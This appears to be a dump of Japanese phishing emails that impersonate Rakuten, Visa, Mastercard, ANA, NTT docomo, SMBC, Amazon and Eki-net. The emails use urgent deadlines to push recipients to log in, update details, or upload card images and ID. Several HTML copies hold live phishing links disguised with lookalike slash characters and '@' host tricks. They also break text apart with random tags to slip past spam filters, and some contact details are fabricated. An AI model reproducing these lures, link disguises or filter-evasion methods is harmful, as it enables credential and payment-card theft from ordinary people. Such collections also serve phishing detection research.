【緊急連絡】楽天ポイント付与エラーのご確認RT=455426039231920
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,140ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【緊急】楽天ポイント未反映の緊急対応のお願いDV=8953814940
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,211ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
大切なご案内:visacardの使用認証をお願い申し上げます。miki-morioka97-dreamer97018
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
重要なお知らせ:visacardの使用確認手続きをお願いします。sasaki-kitaibaraki748794980240
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
ANAマイレージクラブ、マイル加算手続きに関するお知らせ。TK=48497692764
ANAマイレージクラブ会員様へのご案内マイル加算手続きのご案内いつもANAマイレージクラブをご利用いただき、誠にありがとうございます。以下のマイルが自動加算されていないことを確認いたしましたので、ご連絡いたします。未加算マイル:3808マイル有効期限:本メール受信後72時間以内ご予約時の情報と会員情報が一致しないため、マイルが反映されておりません。以下のリンクより必要情報をご確認の上、手続きをお願いいたします。マイル登録手続き※ 本リンクはセキュリティ保護のため、発行後30日間有効です。加算されたマイルの有効期限は加算後12ヶ月です。お問い合わせ先ANAマイレージクラブカスタマーサポート:0120-029-222(受付時間:9:00~19:00、年中無休)メール:rinatsukuba119967_support@ana.co.jpLINE公式アカウント:maiatsugi120@ana_japan公式Twitter:ebihara_shinya82@ANA_Japan※ このメールは自動送信です。ご質問は上記連絡先までお願いいたします。今後ともANAマイレージクラブをよろしくお願いいたします。ANAマイレージクラブ全日本空輸株式会社 ANAマイレージクラブ © 2025 All rights reserved.公式ウェブサイト | サポート | プライバシーポリシー | メール配信停止 | 受信設定変更
【重要】楽天ポイント未反映分の緊急修正のお知らせWZ=57626082964
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,830ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
NTTドコモの利用料金の支払い方法WC=98735814066
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ョふャヅプつきま</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.GuwgETiMK-nwmaCKssR #Sqnlzups-Bqdnrlzp-Qap .fbczghyma-rvpdxkdzde-cmwhkttmt #Tgy-Qliddcoz-Jlfgxpr #Ofs-Neahwuvvx-Snouarzxwr #fwmfpvd-mxpuyd .Unof-Jbxkhcq-Avgqu {
margin:0;
}
</style><style>
#pgpyzcnefrwntiqmk #Atdxtohijhron .ucxiu-krdimidyzg-msv #kuev-zhzyrjrhkx-diltlbzf #oacuec-nnpcnrwior .ShMEAJXMrPYuFENY {
border-left-width:0px;
hyphens:manual;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>こ<widyc>の</widyc>た<qkfeaq>び</qkfeaq>、【お<ugjnuji>客</ugjnuji>様<hbxr>番</hbxr>号】<jbsy>様</jbsy>の【<yzohmq>2</yzohmq>0<caqsvpdp>2</caqsvpdp>5年<zoxy>0</zoxy>6月<yyb>】</yyb>分の料<disbdwgv>金</disbdwgv>の<stnc>お</stnc>支<ewybt>払</ewybt>い<zorai>が</zorai>正常<nojby>に</nojby>完了<rrtxtkyg>し</rrtxtkyg>なかっ<vlptc>た</vlptc>ことを<ctw>お</ctw>知<mwyixu>ら</mwyixu>せいた<mdomn>し</mdomn>ま<ezzn>す</ezzn>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://ejix.com∕nikdq∕khmhmdee∕qsxccjsuq∕izupprybq∕mogzbjrjp∕lespmixrv∕unumhoprx@dsckk.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div><strong>■お問い合わせ先</sTrOnG></div><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
マイル加算手続きの重要なお知らせ(ANAマイレージクラブ)。KO=18299276683173
ANAマイレージクラブ会員様へのご案内マイル加算手続きのご案内いつもANAマイレージクラブをご利用いただき、誠にありがとうございます。以下のマイルが自動加算されていないことを確認いたしましたので、ご連絡いたします。未加算マイル:1990マイル有効期限:本メール受信後72時間以内ご予約時の情報と会員情報が一致しないため、マイルが反映されておりません。以下のリンクより必要情報をご確認の上、手続きをお願いいたします。マイル登録手続き※ 本リンクはセキュリティ保護のため、発行後30日間有効です。加算されたマイルの有効期限は加算後12ヶ月です。お問い合わせ先ANAマイレージクラブカスタマーサポート:0120-029-222(受付時間:9:00~19:00、年中無休)メール:yutakatakahagi92716_support@ana.co.jpLINE公式アカウント:sakurada.daichi344@ana_japan公式Twitter:mochizuki-kashiwa-star@ANA_Japan※ このメールは自動送信です。ご質問は上記連絡先までお願いいたします。今後ともANAマイレージクラブをよろしくお願いいたします。ANAマイレージクラブ全日本空輸株式会社 ANAマイレージクラブ © 2025 All rights reserved.公式ウェブサイト | サポート | プライバシーポリシー | メール配信停止 | 受信設定変更
マスターカードをご利用のお客様へ:安全対策強化のご案内◉CX-93745216576
【重要】セキュリティ保護のための本人確認手続きのお願い
【重要】セキュリティ保護のための本人確認手続きのお願い
平素よりMasterカードをご利用いただき、誠にありがとうございます。
このたび、セキュリティ保護のため、ご登録の携帯電話番号による本人確認をお願いしております。
お手数をおかけしますが、本日中に以下の手続きを完了していただきますようお願い申し上げます。
確認手続きの流れ
下記の「確認手続きを進める」ボタンをクリック
画面の案内に従い、本人確認を完了してください
確認手続きを進める
※手続きが完了していない場合、安全上の理由により一部サービスのご利用が制限される可能性がございます。
ご不明な点がございましたら、Masterカスタマーサービスまでお気軽にお問い合わせください。
―――
Master カスタマーサービス
公式サイト:https://www.mastercard.co.jp/
【三井住友カード】Vpassご利用確認のお願い. 番号:AZ-[8089916]-
本いつも弊社カードをご利用いただきありがとうございます。
昨今の第三者不正利用の急増に伴い、弊社では「不正利用監視システム」を導入し、24時間365日体制でカードのご利用に対するモニタリングを行っております。
このたび、ご本人様のご利用かどうかを確認させていただきたいお取引がありましたので、誠に勝手ながら、カードのご利用を一部制限させていただき、ご連絡させていただきました。
つきましては、以下へアクセスの上、カードのご利用確認にご協力をお願い致します。
ご回答をいただけない場合、カードのご利用制限が継続されることもございますので、予めご了承下さい。
ご利用確認はこちら
━━━━━━━
■ 注意事項
━━━━━━━
※カードの個人情報によっては電話で連絡する場合もございます。
※正確な情報は必ず記入してください。
━━━━━━━
■発行者
━━━━━━━
三井住友カード株式会社
〒105-8011 東京都港区海岸1丁目2番20号 汐留ビルディング
Copyright Sumitomo Mitsui Banking Corporation.All Rights Reserved.
セきさび゜あ
【三井住友カード】Vpass情報を更新してください. 番号:LZ-[80791245]-
不正な使用の可能性があるため
カードのご利用にいくつかの制限を設定いたしました。
「ご本人さまの利用であるかを回答ください。
ご回答をいただけない場合、サービスのご利用制限が継続されることがございますので。
予めご了承くださいますようお願い申し上げます
ご利用確認はこちら
※正確な情報をご記入くださいますようお願い申し上げます。
■発行元
三井住友カード株式会社
大阪市中央区今橋4-5-15
カード利用一時停止のご案内(安全対策のため)
<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>MasterCardご利用確認のお願い</title>
<meta charset=UTF-8>
<style>
body {
font-family: Arial, sans-serif;
line-height: 1.6;
color: #333;
max-width: 600px;
margin: 0 auto;
padding: 20px;
}
.header {
text-align: center;
margin-bottom: 25px;
}
.logo {
height: 40px;
}
.title {
font-size: 20px;
font-weight: bold;
margin: 20px 0;
color: #000000;
}
.content {
font-size: 14px;
margin-bottom: 20px;
}
.button-container {
text-align: center;
margin: 25px 0;
}
.button {
display: inline-block;
background-color: #000000;
color: white;
text-decoration: none;
padding: 12px 25px;
border-radius: 4px;
font-size: 14px;
font-weight: bold;
}
.footer {
font-size: 12px;
color: #666666;
margin-top: 30px;
border-top: 1px solid #eeeeee;
padding-top: 15px;
line-height: 1.5;
}
.transaction-details {
background-color: #f5f5f5;
padding: 15px;
margin: 15px 0;
border-radius: 4px;
}
.note {
font-size: 12px;
color: #666666;
margin: 10px 0;
padding-left: 10px;
border-left: 3px solid #cccccc;
}
</style>
<meta name=GENERATOR content="MSHTML 11.00.10570.1001"><style>
.GRmWZbhJ .BeATrrLPd-nKB .JbEZ-wqcylp .Fan-Nioooa-Bdbjdsekvl .hcumkca-vaxffaggqd #von-sAhqiDDJ .CfjxYYnghgWJ {
border-image:none 100% 1 0 stretch;
column-gap:normal;
}
</style></head>
<body>
<div class=header>
<div class=title>MasterCardご利用確認のお願い</div></div>
<div class=content>
<div>いつもMasterCardカードをご利用いただき、ありがとうございます。<br>下記の承認照会取引がございましたため、ご確認をお願いいたします。
</div>
<div class=transaction-details>
<div>ご利用日:22025-06-30</div>
<div>ご利用者:本人</div>
<div>ご利用金額:88,174円</div>
<div>ご利用場所:国内加盟店ショッピング</div></div>
<div
class=note>※本サービスは大切なお知らせのため、メール配信の許諾をいただいていない方にも配信しております。
</div>
<div class=note>※通販サイトなどでのご利用の場合、実際のご利用日時・金額と異なる場合がございます。
</div>
<div
class=note>※国内でご利用された場合でも加盟店の契約状況により「海外加盟店」と表示される場合がございます。
</div>
<div class=note>※ご契約キャンセルとなった場合のお取消し情報は配信されません。 </div>
<div class=button-container><a class=button
href="https://www.wvownvzd.jp∕qbyctfcknx@nsjakuwqb.com/?idtokenhhodozmx=nuqsksru/#qzuulrcdk">確認手続きを進める</a> </div>
<div>画面に表示される指示に従い、必要な手続きを完了してください。<br><br>お客様にはご迷惑、ご心配をお掛けし、誠に申し訳ございません。<br>何卒ご理解いただきたくお願い申しあげます。
</div></div>
<div class=footer>マスターカード 

ジャパン株式会社<br>東京都渋谷区桜丘町26番1号セルリアンタワー16階<br><br>このメールは送信専用です。返信いただいてもお答えできませんのでご了承ください。<br>© 
mastcard., LTD. All rights reserved. </div></body></html>
ドコモの請求に関する支払い情報OL=68852642183450
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]にょえシこベュだ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#lSPmWBuS-GMrKzaeIsN #PZDWqIF-RwyTmYRD .vopkmrzmzukhjepbvrz #Guiwv-Bgclt-Rbfob #pvld-rqx #PiDoQfGSLx-KXDaABTm-MTCHvrj .Dgfnyecujmlkqsw #Cecatge-Pywmxwscim {
counter-increment:none;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>こ<ygdvo>の</ygdvo>たび、<mrtoxe>【</mrtoxe>お客<bpfqzggj>様</bpfqzggj>番<unkyxagh>号</unkyxagh>】様<izsvx>の</izsvx>【20<vvqopdlv>2</vvqopdlv>5年0<qzc>6</qzc>月】分<tytdfous>の</tytdfous>料金の<iqobwj>お</iqobwj>支<ilnt>払</ilnt>いが正<jycz>常</jycz>に完<ittlgu>了</ittlgu>しなか<njachyh>っ</njachyh>た<uarwtugj>こ</uarwtugj>とを<ouhlvt>お</ouhlvt>知らせ<pwcu>い</pwcu>たしま<zrykk>す</zrykk>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://ccvh.com∕thvqrzncmz∕aoexxop∕nkkqczgtj∕zcvrtepq∕ftpfan∕ohgvp∕prsljq@dsckk.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div><strong>■お問い合わせ先</sTrOnG></div><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
ご確認依頼: Amazon アカウントは一時保留中です
club-ch4 様
平素は Amazon をご利用いただき、誠にありがとうございます。
ご利用の Amazon アカウントで異常な活動が検出されました。お客様を保護するため、アカウントを一時保留にし、未発送のご注文、サブスクリプション、ギフトカードの残額も保留にいたしました。
アカウントへのアクセスを再開する方法
下記のボタンより Amazon にサインインし、画面の指示に従ってください。必要な情報をご提供いただき次第、当サイトで調査の上、24時間以内 にご連絡いたします。
Amazon にログイン
提出書類の要件
お支払い方法の所有者確認のために、以下の書類をアップロードしてください:
支払いカードの正面と背面(カード番号の先頭6桁と末尾4桁のみが見えるようにしてください)
支払いカードに関連する取引明細または請求書
政府発行の有効な本人確認書類(氏名、住所、郵便番号、発行機関を含む)
※ 提出された書類は、確認後にシステムから完全に削除されます。
確認ができない場合
72時間以内 にご提出いただいた情報の確認ができない場合、保留中の注文は自動的にキャンセルされます。お支払い方法の所有者確認が完了するまで、アカウントは保留のままとなります。
出品用アカウントをお持ちの場合はご注意ください。FBA 在庫や注文に関するご質問は、Amazon テクニカルサポートにお問い合わせください。
敬具
アカウントスペシャリストチーム
https://www.amazon.co.jp
※ このメールは自動送信されています。ご返信いただいても対応できません。
【緊急連絡】楽天ポイント未加算エラーの確認のお願いKK=26430802341249
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,708ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
お知らせ:visacardのご利用に関する認証が必要です。takanori.toride591199951265
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
ドコモの請求に関する支払い情報HQ=767639641919790
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ろドづデきワぺぁテい</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#emi-phiwmf-dwgwe #Gjddn-Qukoswwqns-Iizbp .Sacmcwmwtk-Bjunzmyiu-Knjnow .Qqfe-Wniisfzdf-Ryovaprld .tynanc-tdwfzql #okhhowq-euqze-pmj .rsxpmquto-olbv {
table-layout:auto;
word-wrap:normal;
}
</style><style>
#sihwuyvpngruvyvnrvy #YmkWtyvx-FoTY-ELJJXg #Rfwtrijgz-Zjb-Wpifbcbm {
text-decoration-color:currentColor;
min-width:0;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>このた<hydkyfl>び</hydkyfl>、<cxopyh>【</cxopyh>お客<edwxpkf>様</edwxpkf>番<sgkqp>号</sgkqp>】様<rnnvsh>の</rnnvsh>【20<wfeqfm>2</wfeqfm>5<hsp>年</hsp>06<usnyv>月</usnyv>】分の<fyznd>料</fyznd>金の<ltmbxcjb>お</ltmbxcjb>支<oiyj>払</oiyj>いが<xzz>正</xzz>常<vzxwtoix>に</vzxwtoix>完<neoxkvr>了</neoxkvr>し<ashhjno>な</ashhjno>かった<vbn>こ</vbn>と<aqtpedob>を</aqtpedob>お<obd>知</obd>ら<rhghh>せ</rhghh>いた<nsn>し</nsn>ま<lfbe>す</lfbe>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://cnlt.net∕ttcujhv∕anbvc∕xzvuegxh∕jgzvhhisd∕cpmyi∕edzlkxien∕rfpjmplzso@dsckk.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div><strong>■お問い合わせ先</sTrOnG></div><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
<重要>【三井住友カード】Vpass利用いただき、ありがとうございます. 番号:QZ-[817992194]-
平素より三井住友カードをご利用いただきありがとうございます。
こちらは三井住友カードのカスタマーサポートセンターです。これまでのご支持と信頼に感謝申し上げます。
残念ながら、最近のシステムチェックでお客様のカード口座にいくつかの異常が見つかりました。お客様の資金の安全を確保するため、この問題を解決するためのメールを送信致しました。
なので、元気を出してください、体が一番ですよっていう思いを伝えたいです」
問題の詳細:
短期間で多くの小額取引が発生していること。
口座の資金が頻繁に変動し、金額の変動が大きいこと。
口座へのログイン場所が異常で、通常のログイン場所と大きく異なること。
解決策:
お客様には、今すぐ三井住友銀行にログインしていただくようお願いいたします。
SMBC CARDオンライン本人認証サービス
インターネットバンキングやモバイルバンキングのパスワードを定期的に変更して、アカウントの安全性を向上させることをお勧めします。
支払情報が変更されたことを発見しました(QRコードでの誘導)
※本メールは重要なお知らせのため、メール配信を「否」にされている方にも送信しております。
━━━━━━━━━━━━━━━━━━━━━
発行者
三井住友カード株式会社
〒135-0061 東京都江東区豊洲2丁目2番31号 SMBC豊洲ビル
Copyright Sumitomo Mitsui Banking Corporation.All Rights Reserved.
ーとテ
【重要情報】楽天ポイント未加算エラーの修正通知LF=8370261285
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,358ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【緊急】えきねっとアカウント異常の即時自動退会解除対応の依頼IA=54389446861610
えきねっと会員様へのご案内セキュリティシステムリニューアルのお知らせ日頃より「えきねっと」をご利用いただきありがとうございます。2025-06-30にセキュリティシステムを全面的にリニューアルしましたため、7日以上にログインしていない方は、今後の利用に支障が出ないよう、このメールを受信後、早急にログインをして個人情報を更新してください。ログインご記入がない場合は、退会手続きをとらせていただきます。お客さまにはご不便をおかけいたしますが、何卒ご理解を賜りますようお願い申し上げます。※ 本メールは、重要なお知らせとしてメールの配信を希望されていないお客さまにもお送りさせていただいております。お問い合わせ先えきねっとカスタマーサポート:050-2016-1601(受付時間:8:00~22:00、年中無休)メール:support@eki-net.com※ このメールは自動送信です。ご質問は上記連絡先までお願いいたします。今後とも「えきねっと」をよろしくお願いいたします。えきねっと株式会社JR東日本ネットステーション © 2025 All rights reserved.公式ウェブサイト | サポート | プライバシーポリシー | メール配信停止 | 受信設定変更